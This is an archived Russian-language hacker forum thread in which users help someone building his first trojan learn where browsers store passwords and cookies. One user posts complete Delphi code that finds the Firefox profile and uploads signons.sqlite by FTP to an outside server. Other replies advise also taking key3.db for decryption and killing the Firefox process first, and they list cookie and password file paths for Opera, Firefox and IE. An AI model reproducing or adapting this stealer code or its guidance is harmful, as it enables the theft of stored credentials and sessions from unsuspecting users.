Откуда из Браузеров Трой тянет инфу о паролях и почте?? [Архив]

Просмотр полной версии : Откуда из Браузеров Трой тянет инфу о паролях и почте??

TikTik

31.12.2009, 00:42

Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста

Gar|k

31.12.2009, 01:18

Если не в ломы напишите еще где лежат cookie в разных обозревателях.
самому лень ) (з.ы в софари не нашел нихрена)

с наступающим!!!

wolmer

31.12.2009, 01:27

Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста
Mozilla

Вроде как файле signons.sqlite -> сохр пароли (но не уверен)(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\sign ons.sqlite')

Код который тырит сохр. пароли:
unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, IdFTP;

type
TForm1 = class(TForm)
ListBox1: TListBox;
Edit1: TEdit;
IdFTP1: TIdFTP;
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

//На переменные которые лишние -> не обращаем внимания :)

function GetUserFromWindows: string;
var
UserName : string;
UserNameLen : Dword;
begin
UserNameLen := 255;
SetLength(userName, UserNameLen);
if GetUserName(PChar(UserName), UserNameLen) then
Result := Copy(UserName,1,UserNameLen - 1)
else
Result := 'Unknown';
end;

function GetSystemDisk: string;
var
S: array[0..MAX_PATH] of Char;
begin
GetWindowsDirectory(S,SizeOf(S));
Result:=copy(S,0,1);
end;

procedure TForm1.FormCreate(Sender: TObject);
var
User,Disc:string;
coock,st,mask:string;
f:TextFile;
i:integer;
Sf:tsearchrec;
find:integer;
Firefox:string;
FireFoxUser:string;
begin
//code by wolmer
Disc:=GetSystemDisk;
User:=GetUserFromWindows;
find:=FindFirst(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\*',faDirectory,sf);
if find=0 then
begin
if ((Sf.Attr and faDirectory) = faDirectory) and
((Sf.Name = '.') or (Sf.Name = '..')) then
begin
Find:=FindNext(Sf);
end;
find:=FindNext(sf);
FireFoxUser:=sf.name;
end;
Firefox:= Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\sign ons.sqlite';
if FileExists(Firefox) then
begin
IdFTP1.Username:='123';
IdFTP1.Password:='123';
IdFTP1.Host:='ftp.narod.ru';
IdFTP1.Port:=21;
IdFTP1.Connect();
IdFTP1.Put(FireFox, 'NameFile1');
IdFTP1.Disconnect;
end;
end;

end.

Ну а куки мозила хранит в cookies.sqlite

Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox

TikTik

31.12.2009, 01:55

Ну а куки мозила хранит в cookies.sqlite

Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefoxcпаси бо !!только не могу найти где же эти cocie.sqlite :((

там вот вычитал что есть такой cookies.txt а гдеон падлюка спрятан блиинн :mad:

ProTeuS

31.12.2009, 02:01

opera = wand.dat

wolmer

31.12.2009, 02:11

cпасибо !!только не могу найти где же эти cocie.sqlite
Не ужели их тут нету? -> Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\'

В основном в этом пути все хорошое/вкусное держится

Linkus

31.12.2009, 02:13

Код который тырит сохр. пароли:

ну спёр ты signons.sqlite, а дальше что с ним делать? :) написал бы чем расшифровывать :) и по-моему без key3.db ничего не сделаешь :)

wolmer

31.12.2009, 02:15

ну спёр ты signons.sqlite, а дальше что с ним делать? :) написал бы чем расшифровывать :) и по-моему без key3.db ничего не сделаешь :)
Взял информацию из первого же источника в гугле, в крайнем случае ничего не мешает добавить еще одну строчку на залив файла key3.db

(чем расшифровывать -> гуглите, в крайнем случае -> офф сайт мозилы)

TikTik

31.12.2009, 03:34

хм а имя юзера в Profile всегда разное какже путь та указывать до папочки :(

Linkus

31.12.2009, 03:52

хм а имя юзера в Profile всегда разное какже путь та указывать до папочки :(

читай код, приведённый wolmer'ом внимательнее :)

там находится первая попавшаяся папка в \Profiles, имя которой отлично от . и ..

можно для всех найденных папок реализовать, если их несколько :)

TikTik

31.12.2009, 04:12

Linkus
у меня просто свой трояшка :)
1й написаный мной вот в чём дело :)
я ещё совсем зелёный))

hacknick

03.01.2010, 20:35

Для Mozilla:
signons3.txt - файл паролей*
*Если установлен мастер пароль то еще и key3.db пригодится

P.S. В последних версиях firefox не позволяет просто так взять и украть сие файлы, нужно предварительно вырубать процесс

Gar|k

03.01.2010, 22:12

Все молчат что-то..

вот пути где лежат печеньки:

c:\Users\%USERNAME%\AppData\Roaming\Opera\Opera\co okies4.dat - Opera 10.10 win7
c:\Documents and Settings\%USERNAME%\Application Data\Opera\Opera\cookies4.dat - Opera 10.10 winXP
c:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefo x\Profiles\%хрензнаетчо%.default\cookie s.sqlite - FireFox 3.5.6 win 7
c:\Documents and Settings\%USERNAME%\Application Data\Mozilla\Firefox\Profiles\%хрензнает� �о%.default\cookies.sqlite - FireFox 3.5.6 winXP
c:\Users\%USERNAME%\AppData\Roaming\Microsoft\Wind ows\Cookies\ - IE 8 win7
c:\Documents and Settings\%USERNAME%\Cookies\*.* - IE 8 winXP